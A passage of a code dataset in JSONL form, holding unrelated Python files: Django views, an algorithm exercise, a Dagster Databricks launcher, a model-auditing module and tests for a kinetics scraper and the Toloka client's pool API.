blank registration form\n form = UserCreateForm\n else:\n # process complete form\n form = UserCreateForm(data=request.POST)\n\n if form.is_valid():\n new_user = form.save()\n authenticated_user = authenticate(username=new_user.username,\n password=request.POST['password1'])\n login(request, authenticated_user)\n return HttpResponseRedirect(reverse('dog_vaycay:index'))\n\n context = {'form': form}\n return render(request, 'accounts/register.html', context)\n\n\ndef profile(request):\n if request.method != 'POST':\n # display blank registration form\n form = UserProfileForm()\n else:\n # process complete form\n form = UserProfileForm(request.POST)\n\n if form.is_valid():\n profile = form.save(commit=False)\n profile.owner = request.user\n form.save()\n return HttpResponseRedirect(reverse('dog_vaycay:index'))\n\n context = {'form': form}\n return render(request, 'accounts/user_profile.html', context)\n\n\n\"\"\"\ndef profile(request):\n if request.method == \"POST\":\n form = UserProfile(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('dog_vaycay:index'))\n else:\n form = UserProfile()\n\n context = {'form': form}\n return render(request, 'accounts/user_profile.html', context)\n\"\"\"","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208724037","text":"n = input()\r\n\r\nalphabet = []\r\nnum = 0\r\nfor i in range(len(n)) :\r\n if n[i].isdigit() :\r\n num += int(n[i])\r\n else :\r\n alphabet.append(n[i])\r\nalphabet.sort()\r\n\r\n# 숫자가 하나라도 존재하는 경우 가장 뒤에 삽입\r\nif num != 0:\r\n alphabet.append(str(num))\r\n\r\n# 최종 결과 출력\r\n# ''.join(list) : 리스트에서 문자열로 변환\r\nprint(''.join(alphabet))\r\n\r\n\r\n# 동빈나씨 코딩\r\n#\r\n# data = input()\r\n# result = []\r\n# value = 0\r\n#\r\n# # 문자를 하나씩 확인하며\r\n# for x in data:\r\n# # 알파벳인 경우 결과 리스트에 삽입\r\n# if x.isalpha():\r\n# result.append(x)\r\n# # 숫자는 따로 더하기\r\n# else:\r\n# value += int(x)\r\n#\r\n# # 알파벳을 오름차순으로 정렬\r\n# result.sort()\r\n#\r\n# # 숫자가 하나라도 존재하는 경우 가장 뒤에 삽입\r\n# if value != 0:\r\n# result.append(str(value))\r\n#\r\n# # 최종 결과 출력\r\n# print(''.join(result))\r\n","sub_path":"ALGORITHM/BAEKJOON/SOURCE/02. Implemented(구현)/4. 문자의 재정렬.py","file_name":"4. 문자의 재정렬.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323077176","text":"\"\"\"用于多线程的队列之LifoQueue\"\"\"\n\n\"\"\"\n LifoQueue的特点是Lifo(Last in first out,后进先出),也就是说,入队和出队都是在队尾。\n 后进先出的队列其实就是栈。\n 《图解Python》\n\"\"\"\nfrom queue import LifoQueue\n\nlq = LifoQueue()\n\nlq.put('obj1')\nlq.put('obj2')\nlq.put('obj3')\n\nprint(lq.get()) # obj3\nprint(lq.get()) # obj2\nprint(lq.get()) # obj1\n","sub_path":"17_process_thread/48_7_multithread_lifequeque.py","file_name":"48_7_multithread_lifequeque.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557010967","text":"\"\"\"The main entrypoint for ops executed using the DatabricksPySparkStepLauncher.\n\nThis script is launched on Databricks using a `spark_python_task` and is passed the following\nparameters:\n\n- the DBFS path to the pickled `step_run_ref` file\n- the DBFS path to the zipped dagster job\n- paths to any other zipped packages which have been uploaded to DBFS.\n\"\"\"\n\nimport os\nimport pickle\nimport site\nimport sys\nimport tempfile\nimport zipfile\n\nfrom dagster.core.execution.plan.external_step import PICKLED_EVENTS_FILE_NAME, run_step_from_ref\nfrom dagster.core.instance import DagsterInstance\nfrom dagster.serdes import serialize_value\n\n# This won't be set in Databricks but is needed to be non-None for the\n# Dagster step to run.\nif \"DATABRICKS_TOKEN\" not in os.environ:\n os.environ[\"DATABRICKS_TOKEN\"] = \"\"\n\n\ndef main(\n step_run_ref_filepath,\n setup_filepath,\n dagster_job_zip,\n):\n # Extract any zip files to a temporary directory and add that temporary directory\n # to the site path so the contained files can be imported.\n #\n # We can't rely on pip or other packaging tools because the zipped files might not\n # even be Python packages.\n with tempfile.TemporaryDirectory() as tmp:\n\n with zipfile.ZipFile(dagster_job_zip) as zf:\n zf.extractall(tmp)\n site.addsitedir(tmp)\n\n # We can use regular local filesystem APIs to access DBFS inside the Databricks runtime.\n with open(setup_filepath, \"rb\") as handle:\n databricks_config = pickle.load(handle)\n\n # sc and dbutils are globally defined in the Databricks runtime.\n databricks_config.setup(dbutils, sc) # noqa pylint: disable=undefined-variable\n\n with open(step_run_ref_filepath, \"rb\") as handle:\n step_run_ref = pickle.load(handle)\n print(\"Running dagster job\") # noqa pylint: disable=print-call\n with DagsterInstance.ephemeral() as instance:\n events = list(run_step_from_ref(step_run_ref, instance))\n\n events_filepath = os.path.dirname(step_run_ref_filepath) + \"/\" + PICKLED_EVENTS_FILE_NAME\n with open(events_filepath, \"wb\") as handle:\n pickle.dump(serialize_value(events), handle)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"python_modules/libraries/dagster-databricks/dagster_databricks/databricks_step_main.py","file_name":"databricks_step_main.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151652490","text":"import unittest\nfrom automatedsearch import AutomatedSearch\nimport urllib.request as ur\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\n\n\nclass TestScrapping(unittest.TestCase):\n website = \"https://kinetics.nist.gov/kinetics/index.jsp\"\n react_name = \"(CH3)3COOh\"\n automated_search = AutomatedSearch(website, react_name)\n\n def run_tests(self):\n \"\"\" this function run test\"\"\"\n\n loader = unittest.TestLoader()\n suite = unittest.TestSuite()\n # add tests to the test suite\n suite.addTests(loader.loadTestsFromModule(self))\n # initialize a runner, pass it your suite and run it\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n def test_search(self):\n self.react_name = \"(CH3)3COOho\"\n self.automated_search = AutomatedSearch(self.website, self.react_name)\n expected = pd.DataFrame({\"reactants\": [(\"CH(OCH3)3\", \"·F\"), (\"CH(OCH3)3\", \"·OH\")], \"products\": [(\"Trimethoxymethane\", \"radical\", \"HF\"), (\"Trimethoxymethane\", \"radical\", \"H2O\")], \"rate_reaction\": [\"8.314472\", \"8.314472\"]})\n results = self.automated_search.search()\n assert_frame_equal(expected, results)\n\n def test_search_length(self):\n size = len(self.automated_search.search())\n self.assertEqual(size, 19)\n\n def test_send_key_match(self):\n reactions_web_element, record_number = self.automated_search.send_key(self.website, self.react_name)\n self.assertEqual(len(reactions_web_element), 19)\n self.assertEqual(int(record_number), 39)\n\n def test_send_key_not_match(self):\n self.assertRaises(NameError, self.automated_search.send_key(self.website, \"amcharhal\"))\n\n def test_html_parse(self):\n link_elements = ['https://kinetics.nist.gov/kinetics/ReactionSearch?r0=7732185&r1='\n '590389143&r2=0&r3=0&r4=0&p0=79414&p1=7732185&p2=7732185&p3=0&p4=0&'\n 'expandResults=true&']\n read = ur.urlopen(link_elements[0])\n soup = BeautifulSoup(read, 'html.parser')\n results = self.automated_search.html_parse(link_elements)[0]\n self.assertAlmostEqual(len(str(soup)), len(str(results)))\n\n def test_html_navigate(self):\n read = ur.urlopen(\"https://kinetics.nist.gov/kinetics/ReactionSearch?r0=7732185&r1=590389143&r2=0&r3=0&r4=0&p0=79414&p1=7732185&p2=7732185&p3=0&p4=0&expandResults=true&\")\n soup = BeautifulSoup(read, 'html.parser')\n results = self.automated_search.html_navigate(soup)\n expected = {\"reactants\": ('H2O', 'CH2=C(CH3)-CH(OH)(OOH)'), \"products\": ('CH2=C(CH3)COOH', 'H2O', 'H2O'), \"rate_reaction\": str(8.314472)}\n self.assertEqual(results, expected)\n\n\n","sub_path":"venv/include/testscrapping.py","file_name":"testscrapping.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"415760885","text":"# -*- coding: utf8 -*-\n\nfrom .models import NoticiaInterna, NoticiaExterna\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\n\n\ndef NoticiasIndex(request):\n context = RequestContext(request)\n noticia_interna = NoticiaInterna.objects.all()\n noticia_externa = NoticiaExterna.objects.all()\n\n listado = {\n 'ni': noticia_interna,\n 'ne': noticia_externa,\n }\n return render_to_response('prensa/noticias.html', listado, context)\n","sub_path":"intranet_raiz/prensa/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516535982","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Main module.\"\"\"\nimport warnings\nfrom collections import Counter\nfrom math import sqrt\n\nimport mlprimitives\nimport numpy as np\nfrom mlblocks import MLPipeline\nfrom scipy.stats import entropy\nfrom sklearn import metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.neighbors import NearestNeighbors\nimport pandas as pd\nfrom cardea.modeling.modeler import Modeler\n\n\nclass ModelAuditor():\n __name__ = 'ModelAuditor'\n\n def run_fold(self, features_train, target, feature_test, primitive, hyperparameters=None):\n '''Runs Kfold cross-validation where it predicts all the primitives within the pipeline.\n\n Args:\n features_train: the training features.\n features_test: the testing features.\n target: a list of the folds targets.\n primitive: the machine learning primitive to run.\n hyperparameters: the hyperparameters of the given primitives.\n\n Returns:\n A list of the folds' results for the primitives that are passed.\n '''\n\n # assert that the features and targets have the same size\n modeler = Modeler()\n #pipeline = self.create_pipeline(primitive, hyperparameters)\n pipeline = modeler.create_pipeline(primitive, hyperparameters)\n last_block_in_pipeline = list(pipeline.blocks.values())[-1]\n #Add an if statement based on the type of output for the last block (array, ndarray, DataFrame)\n for output in last_block_in_pipeline.produce_output:\n check_name = output['name'] == 'X' or output['name'] == 'y'\n check_numpy = output['type'] == 'array' or output['type'] == 'ndarray'\n check_pandas = output['type'] == 'DataFrame' or output['type'] == 'Series'\n if check_name and (check_numpy or check_pandas):\n features_train = pd.DataFrame(features_train)\n feature_test = pd.DataFrame(feature_test)\n target = pd.Series(target)\n return modeler.fit_predict_model(features_train, target, feature_test, pipeline)\n return None\n\n def generate_kfolds(self, features, target, n_folds=10):\n '''Creates Kfold cross-validation for the given features and targets\n\n Args:\n features: The features as a numpy array to create the k-folds for\n target: a list of the folds targets\n n_folds: the number of folds to create\n\n Returns:\n a tuple that consist of two values, the folds features and the folds targets\n '''\n kf = KFold(n_splits=n_folds, shuffle=True)\n folds_features = []\n folds_targets = []\n for train_index, test_index in kf.split(features):\n X_train = features[train_index]\n X_test = features[test_index]\n y_train = target[train_index]\n y_test = target[test_index]\n folds_features.append([X_train, X_test])\n folds_targets.append([y_train, y_test])\n\n return folds_features, folds_targets\n\n def execute_pipeline(self, pipeline_primitives, features_train, target,\n features_test, problem_type, hyperparameters = None,\n with_intermediate = False):\n '''Executes a pipeline and generates all the intermediates of the pipeline.\n\n Args:\n pipeline_primitives: Array of the pipeline primitives.\n features_train: the training features data to run through the pipeline.\n features_test: the testing features data to run through the pipeline.\n target: The target of the training data to run through the pipeline.\n problem_type: the type of the problem (classification or regression).\n hyperparameters: the hyperparameters to run for the model\n with_intermediate: A boolean to add or ignore the intermediates metrics.\n\n Returns:\n a tuple that consist of three values,the intermediates,\n the folds features and the folds targets.\n '''\n pipeline_intermediates = []\n if with_intermediate:\n all_partial_primitives = [pipeline_primitives[:index] for index in range(1,len(pipeline_primitives) + 1)]\n else:\n all_partial_primitives = [pipeline_primitives]\n for partial_primitives in all_partial_primitives:\n pipeline_results = self.run_fold(features_train, target,\n features_test, partial_primitives,\n hyperparameters)\n\n #if pipeline_results != None:\n pipeline_intermediates.append(pipeline_results)\n\n return pipeline_intermediates\n\n def report_regression_result(self, actual, predicted):\n '''Reports the prediction results for a regression model.\n\n Args:\n actual: A 1d list of the target variable for the actual test data.\n predicted: A 1d list of the prediction result.\n\n Returns:\n A json object of various evaluation metrics for regression.\n '''\n metrics_to_calculate = [['explained_variance_score', metrics.explained_variance_score],\n ['mean_absolute_error', metrics.mean_absolute_error],\n ['mean_squared_error', metrics.mean_squared_error],\n ['mean_squared_log_error', metrics.mean_squared_log_error],\n ['median_absolute_error', metrics.median_absolute_error],\n ['r2_score', metrics.r2_score]]\n results_dict = {}\n for metric in metrics_to_calculate:\n try:\n results_dict[metric[0]] = metric[1](actual, predicted)\n except BaseException:\n warnings.warn(\n '{} can\\'t be calculated for this data'.format(metric[0]),\n UserWarning)\n return results_dict\n\n def report_classification_result(self, actual, predicted):\n '''Reports the prediction results for a classification model.\n\n Args:\n actual: A 1d list of the target variable for the actual test data.\n predicted: A 1d list of the prediction result.\n n_class: Int of the number of classes in the classification problem.\n prediction_proba: The classes prediction probabilities that are\n produced by predict_proba.\n\n\n Returns:\n A json object of various evaluation metrics for classification.\n '''\n metrics_to_calculate = [['accuracy', metrics.accuracy_score],\n ['f1', metrics.f1_score],\n ['precision', metrics.precision_score],\n ['recall', metrics.recall_score],\n ['class_count', Counter]]\n results_dict = {}\n for metric in metrics_to_calculate:\n try:\n if metric[0] == 'accuracy':\n results_dict[metric[0]] = metric[1](actual, predicted)\n elif metric[0] == 'class_count':\n counter_dict = metric[1](predicted)\n label_count_sum = sum(counter_dict.values())\n for label in counter_dict.keys():\n results_dict['{}_{}'.format(metric[0], str(\n label))] = counter_dict[label] / label_count_sum\n else:\n results_dict['{}_macro'.format(metric[0])] = metric[1](\n actual, predicted, average='macro')\n except BaseException:\n warnings.warn(\n '{} can\\'t be calculated for this data'.format(metric[0]),\n UserWarning)\n return results_dict\n\n def euclidean_distance(self, x, y):\n '''Computes the euclidean distance between two vectors.\n\n Args:\n x: The first vector.\n y: The second vector.\n\n Returns:\n The euclidean distance.\n '''\n return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))\n\n def intermediate_metrics(self, intermediate):\n '''Generates metrics of the intermediates (features data in-between primitives).\n\n Args:\n intermediate: The intermediate data that must be investigated (for a single fold).\n\n Returns:\n A Summary metrics for the different data columns in the intermediate.\n '''\n if type(intermediate) != pd.DataFrame:\n intermediate = pd.DataFrame(intermediate)\n summary = {}\n for column_name in list(intermediate.columns):\n intermediate_column = intermediate[column_name]\n col_metrics = {}\n col_metrics['index'] = column_name\n \n col_metrics['perc_25'] = np.percentile(intermediate_column, 25)\n col_metrics['perc_50'] = np.percentile(intermediate_column, 50)\n col_metrics['perc_75'] = np.percentile(intermediate_column, 75)\n \n col_metrics['variance'] = np.var(intermediate_column)\n col_metrics['std'] = np.std(intermediate_column)\n \n col_metrics['entropy'] = entropy(intermediate_column)\n\n summary[column_name] = col_metrics\n return summary\n\n def find_k_nearest_neighbors(self, data, instance, k=5):\n '''Finds the k-nearest neighbors from the data to an instance.\n\n Args:\n data: The data that will be searched to find the nearest neighbors.\n instance: the instance that needs to identify its nearest neighbors.\n k: the number of nearest neighbors to consider.\n\n Returns:\n Array of the k nearest neighbors to the instance.\n '''\n nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(data)\n distances, indices = nbrs.kneighbors([instance])\n\n return data[indices]\n\n def summarize_nearest_neighbors(self, folds_features, folds_targets, k=5):\n '''Summarizes the nearest neighbors of a sample in the data.\n\n Args:\n folds_features: The folds containing the training and testing of the features data.\n folds_targets: The folds containing the training and testing of the target data.\n k: the number of nearest neighbors to consider\n\n Returns:\n Summary of all the features for the nearest neighbors.\n '''\n nearest_neighbors_summary = []\n for x, y in zip(folds_features, folds_targets):\n X_train = x[0]\n X_test = x[1]\n y_test = y[1]\n\n indices_to_select = np.random.choice(range(len(X_test)), k, replace=False)\n chosen_instances_features = X_test[indices_to_select]\n chosen_instances_targets = y_test[indices_to_select]\n fold_nearest_neighbors_summary = []\n for instance_features, instance_target in zip(\n chosen_instances_features, chosen_instances_targets):\n nearest_neighbors = self.find_k_nearest_neighbors(X_train, instance_features, k)\n neighbors_summary = self.intermediate_metrics(nearest_neighbors)\n fold_nearest_neighbors_summary.append({'instance_features': instance_features,\n 'instance_target': instance_target,\n 'neighbors_summary': neighbors_summary})\n\n nearest_neighbors_summary.append(fold_nearest_neighbors_summary)\n\n return nearest_neighbors_summary\n\n def generate_pipeline_report(self, pipeline_primitives, features,\n target, problem_type, hyperparameters = None,\n with_intermediates_metrics = False,\n with_nearest_neighbors = False):\n '''Generates the full report of the model auditor in a json format.\n\n Args:\n pipeline_primitives: Array of the pipeline primitives to run.\n features: The features data to run through the pipeline.\n target: The target data to run through the pipeline.\n problem_type: The type of the problem (classification or regression).\n hyperparameters: Specify parameters that must be specified in the primitives.\n with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.\n with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.\n\n Returns:\n A json file of the model auditing results.\n '''\n\n report = {}\n # Generate the folds\n columns_names = list(features.columns)\n features = np.array(features)\n target = np.array(target)\n folds_features, folds_targets = self.generate_kfolds(features, target)\n # create the intermediates\n intermediates_list = []\n for x, y in zip(folds_features, folds_targets):\n X_train = pd.DataFrame(x[0],columns = columns_names)\n X_test = pd.DataFrame(x[1],columns = columns_names)\n y_train = y[0]\n fold_intermediates_list = self.execute_pipeline(pipeline_primitives, X_train,\n y_train, X_test, problem_type,\n with_intermediate = with_intermediates_metrics,\n hyperparameters = hyperparameters)\n intermediates_list.append(fold_intermediates_list)\n\n # print(intermediates_list)\n output_result = []\n if problem_type == 'classification':\n for actual, predicted in zip(folds_targets, intermediates_list):\n fold_result = self.report_classification_result(actual[1], predicted[-1])\n output_result.append(fold_result)\n elif problem_type == 'regression':\n for actual, predicted in zip(folds_targets, intermediates_list):\n fold_result = self.report_regression_result(actual[1], predicted[-1])\n output_result.append(fold_result)\n report['output_result'] = output_result\n\n if with_intermediates_metrics:\n intermediates_metrics = {}\n for fold in intermediates_list:\n for idx,intermediate in enumerate(fold[:-1]):\n intermediate_key = str(idx)+ '.' + pipeline_primitives[idx]\n try:\n intermediate_result = self.intermediate_metrics(intermediate)\n intermediates_metrics[intermediate_key] = intermediate_result\n except BaseException as e:\n print(e.args)\n warnings.warn(\n 'intermediate metrics can\\'t be calculated for {}'.format(intermediate_key),\n UserWarning)\n report['intermediates_result'] = intermediates_metrics\n\n if with_nearest_neighbors:\n nearest_neighbors = self.summarize_nearest_neighbors(folds_features, folds_targets, k=5)\n report['nearest_neighbors'] = nearest_neighbors\n\n return report\n\n def generate_pipeline_report_with_test(self, pipeline_primitives, features,\n target, test, actual, problem_type, hyperparameters = None,\n with_intermediates_metrics = False,\n with_nearest_neighbors = False):\n\n '''Generates the full report of the model auditor in a json format.\n\n Args:\n pipeline_primitives: Array of the pipeline primitives to run.\n features: The features data to run through the pipeline.\n target: The target data to run through the pipeline.\n problem_type: The type of the problem (classification or regression).\n hyperparameters: Specify parameters that must be specified in the primitives.\n with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.\n with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.\n\n Returns:\n A json file of the model auditing results.\n '''\n\n report = {}\n # Generate the folds\n columns_names = list(features.columns)\n X_train = np.array(features)\n y_train = np.array(target)\n\n X_test = np.array(test)\n y_test = np.array(actual)\n\n # print(\"X_train \", X_train.shape)\n # print(\"y_train \", y_train.shape)\n # print(\"X_test \", X_test.shape)\n # print(\"y_test \", y_test.shape)\n\n y_pred = self.execute_pipeline(pipeline_primitives, X_train, y_train, X_test, problem_type,\n with_intermediate=False,\n hyperparameters=hyperparameters)\n\n output_result = []\n if problem_type == 'classification':\n fold_result = self.report_classification_result(y_test, y_pred[-1])\n output_result.append(fold_result)\n elif problem_type == 'regression':\n fold_result = self.report_regression_result(y_test, y_pred[-1])\n output_result.append(fold_result)\n report['output_result'] = output_result\n\n if with_nearest_neighbors:\n nearest_neighbors = self.summarize_nearest_neighbors(X_test, y_test, k=5)\n report['nearest_neighbors'] = nearest_neighbors\n\n return report\n\n","sub_path":"notebooks/research/model_audit.py","file_name":"model_audit.py","file_ext":"py","file_size_in_byte":17636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"146598035","text":"import datetime\nfrom operator import itemgetter\nimport logging\nfrom urllib.parse import urlparse, parse_qs\n\nimport pytest\nimport toloka.client as client\n\n\ndef test_find_pools(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n raw_result = {'items': [pool_map_with_readonly], 'has_more': False}\n\n def pools(request, context):\n assert {\n 'project_id': ['10'],\n 'id_gt': ['20'],\n 'last_started_lt': ['2016-03-23T12:59:00'],\n 'sort': ['created,-id'],\n } == parse_qs(urlparse(request.url).query)\n return raw_result\n\n requests_mock.get(f'{toloka_url}/pools', json=pools)\n\n # Request object syntax\n request = client.search_requests.PoolSearchRequest(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n )\n sort = client.search_requests.PoolSortItems(['created', '-id'])\n result = toloka_client.find_pools(request, sort=sort)\n assert raw_result == client.unstructure(result)\n\n # Expanded syntax\n result = toloka_client.find_pools(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n sort=['created', '-id'],\n )\n assert raw_result == client.unstructure(result)\n\n\ndef test_get_pools(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n pools = [dict(pool_map_with_readonly, id=str(i)) for i in range(100)]\n pools.sort(key=itemgetter('id'))\n expected_pools = [pool for pool in pools if pool['id'] > '20']\n\n def get_pools(request, context):\n params = parse_qs(urlparse(request.url).query)\n id_gt = params.pop('id_gt')[0]\n assert {\n 'project_id': ['10'],\n 'last_started_lt': ['2016-03-23T12:59:00'],\n 'sort': ['id'],\n } == params\n\n items = [pool for pool in pools if id_gt is None or pool['id'] > id_gt][:3]\n return {'items': items, 'has_more': items[-1]['id'] != pools[-1]['id']}\n\n requests_mock.get(f'{toloka_url}/pools', json=get_pools)\n\n # Request object syntax\n request = client.search_requests.PoolSearchRequest(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n )\n result = toloka_client.get_pools(request)\n assert expected_pools == client.unstructure(list(result))\n\n # Expanded syntax\n result = toloka_client.get_pools(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n )\n assert expected_pools == client.unstructure(list(result))\n\n\ndef test_get_pool(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly)\n assert pool_map_with_readonly == client.unstructure(toloka_client.get_pool('21'))\n\n\ndef test_get_pool_training(requests_mock, toloka_client, toloka_url, training_pool_map):\n requests_mock.get(f'{toloka_url}/pools/22', json=training_pool_map)\n assert training_pool_map == client.unstructure(toloka_client.get_pool('22'))\n\n\ndef test_create_pool(requests_mock, toloka_client, toloka_url, pool_map, pool_map_with_readonly, caplog):\n\n def pools(request, context):\n assert pool_map == request.json()\n return pool_map_with_readonly\n\n requests_mock.post(f'{toloka_url}/pools', json=pools, status_code=201)\n pool = client.structure(pool_map, client.pool.Pool)\n with caplog.at_level(logging.INFO):\n caplog.clear()\n result = toloka_client.create_pool(pool)\n assert caplog.record_tuples == [(\n 'toloka.client', logging.INFO,\n 'A new pool with ID \"21\" has been created. Link to open in web interface: https://sandbox.toloka.yandex.com/requester/project/10/pool/21'\n )]\n assert pool_map_with_readonly == client.unstructure(result)\n\n\ndef test_create_pool_check_all_filters(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n\n pool_map = {\n **pool_map_with_readonly,\n 'filter': {\n 'and': [\n {\n 'or': [\n {'category': 'profile', 'key': 'gender', 'operator': 'EQ', 'value': 'FEMALE'},\n {'category': 'profile', 'key': 'country', 'operator': 'NE', 'value': 'BE'},\n ],\n },\n {'category': 'profile', 'key': 'citizenship', 'operator': 'EQ', 'value': 'BY'},\n {'category': 'profile', 'key': 'education', 'operator': 'EQ', 'value': 'MIDDLE'},\n {'category': 'profile', 'key': 'adult_allowed', 'operator': 'EQ', 'value': True},\n {'category': 'profile', 'key': 'date_of_birth', 'operator': 'GT', 'value': 604972800},\n {'category': 'profile', 'key': 'city', 'operator': 'NOT_IN', 'value': 225},\n {'category': 'profile', 'key': 'languages', 'operator': 'IN', 'value': 'RU'},\n {\n 'and': [\n {'category': 'computed', 'key': 'region_by_phone', 'operator': 'IN', 'value': 213},\n {'category': 'computed', 'key': 'region_by_ip', 'operator': 'NOT_IN', 'value': 1},\n ]\n },\n {'category': 'computed', 'key': 'device_category', 'operator': 'EQ', 'value': 'PERSONAL_COMPUTER'},\n {'category': 'computed', 'key': 'os_family', 'operator': 'EQ', 'value': 'WINDOWS'},\n {'category': 'computed', 'key': 'os_version', 'operator': 'GTE', 'value': 8.1},\n {'category': 'computed', 'key': 'os_version_major', 'operator': 'GT', 'value': 8},\n {'category': 'computed', 'key': 'os_version_minor', 'operator': 'GTE', 'value': 1},\n {'category': 'computed', 'key': 'os_version_bugfix', 'operator': 'LTE', 'value': 225},\n {'category': 'computed', 'key': 'user_agent_type', 'operator': 'EQ', 'value': 'BROWSER'},\n # {'category': 'computed', 'key': 'user_agent_family', 'operator': 'NE', 'value': 'OPERA'},\n {'category': 'computed', 'key': 'user_agent_version', 'operator': 'LT', 'value': 11.12},\n {'category': 'computed', 'key': 'user_agent_version_major', 'operator': 'LT', 'value': 11},\n {'category': 'computed', 'key': 'user_agent_version_minor', 'operator': 'LT', 'value': 12},\n {'category': 'computed', 'key': 'user_agent_version_bugfix', 'operator': 'GT', 'value': 2026},\n {'category': 'computed', 'key': 'rating', 'operator': 'GTE', 'value': 885.15},\n {\n 'or': [\n {'category': 'skill', 'key': '224', 'operator': 'GTE', 'value': 85},\n {'category': 'skill', 'key': '300', 'operator': 'NE', 'value': None},\n {'category': 'skill', 'key': '350', 'operator': 'EQ', 'value': 75.512},\n ]\n }\n ]\n }\n }\n\n def pools(request, context):\n assert pool_map == request.json()\n return pool_map\n\n requests_mock.post(f'{toloka_url}/pools', json=pools, status_code=201)\n\n import toloka.client.filter as filter\n\n pool = client.structure(pool_map_with_readonly, client.pool.Pool)\n pool.filter = (\n ((filter.Gender == filter.Gender.FEMALE) | (filter.Country != 'BE')) &\n (filter.Citizenship == 'BY') &\n (filter.Education == filter.Education.MIDDLE) &\n (filter.AdultAllowed == True) & # noqa: E712\n (filter.DateOfBirth > 604972800) &\n (filter.City.not_in(225)) &\n (filter.Languages.in_('RU')) &\n (filter.RegionByPhone.in_(213) & filter.RegionByIp.not_in(1)) &\n (filter.DeviceCategory == filter.DeviceCategory.PERSONAL_COMPUTER) &\n (filter.OSFamily == filter.OSFamily.WINDOWS) &\n (filter.OSVersion >= 8.1) &\n (filter.OSVersionMajor > 8) &\n (filter.OSVersionMinor >= 1) &\n (filter.OSVersionBugfix <= 225) &\n (filter.UserAgentType == filter.UserAgentType.BROWSER) &\n (filter.UserAgentVersion < 11.12) &\n (filter.UserAgentVersionMajor < 11) &\n (filter.UserAgentVersionMinor < 12) &\n (filter.UserAgentVersionBugfix > 2026) &\n (filter.Rating >= 885.15) &\n ((filter.Skill('224') >= 85) | (filter.Skill('300') != None) | (filter.Skill('350') == 75.512))\n )\n result = toloka_client.create_pool(pool)\n assert client.structure(pool_map, client.pool.Pool) == result\n assert pool_map == client.unstructure(result)\n\n\n@pytest.fixture\ndef pool_map_without_filter(pool_map_with_readonly):\n pool_map_without_filter = pool_map_with_readonly.copy()\n del pool_map_without_filter['filter']\n return pool_map_without_filter\n\n\ndef test_unstructure_pool_check_one_filter_wrap(requests_mock, toloka_client, toloka_url, pool_map_without_filter):\n pool_map = {\n **pool_map_without_filter,\n 'filter': {\n 'and': [\n {'category': 'profile', 'key': 'languages', 'operator': 'IN', 'value': 'EN'},\n ]\n }\n }\n\n def pools(request, context):\n assert pool_map == request.json()\n return pool_map\n\n requests_mock.post(f'{toloka_url}/pools', json=pools, status_code=201)\n\n import toloka.client.filter as filter\n\n pool = client.structure(pool_map_without_filter, client.pool.Pool)\n pool.filter = filter.Languages.in_('EN')\n result = toloka_client.create_pool(pool)\n assert client.structure(pool_map, client.pool.Pool) == result\n assert pool_map == client.unstructure(result)\n\n\ndef test_unstructure_pool_filter_after_init():\n import toloka.client.filter as filter\n\n pool = client.pool.Pool(\n project_id=42,\n private_name='Pool 1',\n may_contain_adult_content=False,\n reward_per_assignment=1000.01,\n assignment_max_duration_seconds=10,\n defaults=client.pool.Pool.Defaults(default_overlap_for_new_task_suites=1),\n # we testing just this:\n filter=filter.Languages.in_('EN')\n )\n\n filter_map = {\n 'and': [\n {'category': 'profile', 'key': 'languages', 'operator': 'IN', 'value': 'EN'},\n ]\n }\n\n unstructed_pool = client.unstructure(pool)\n assert 'filter' in unstructed_pool\n assert filter_map == unstructed_pool['filter']\n\n\ndef test_update_pool(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n updated_pool = {\n **pool_map_with_readonly,\n 'private_name': 'updated name',\n 'private_comment': 'updated comment',\n }\n\n def pools(request, context):\n assert updated_pool == request.json()\n return updated_pool\n\n requests_mock.put(f'{toloka_url}/pools/21', json=pools)\n result = toloka_client.update_pool('21', client.structure(updated_pool, client.pool.Pool))\n assert updated_pool == client.unstructure(result)\n\n\ndef test_patch_pool(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n raw_result = {**pool_map_with_readonly, 'priority': 42}\n\n def pools(request, context):\n assert {'priority': 42} == 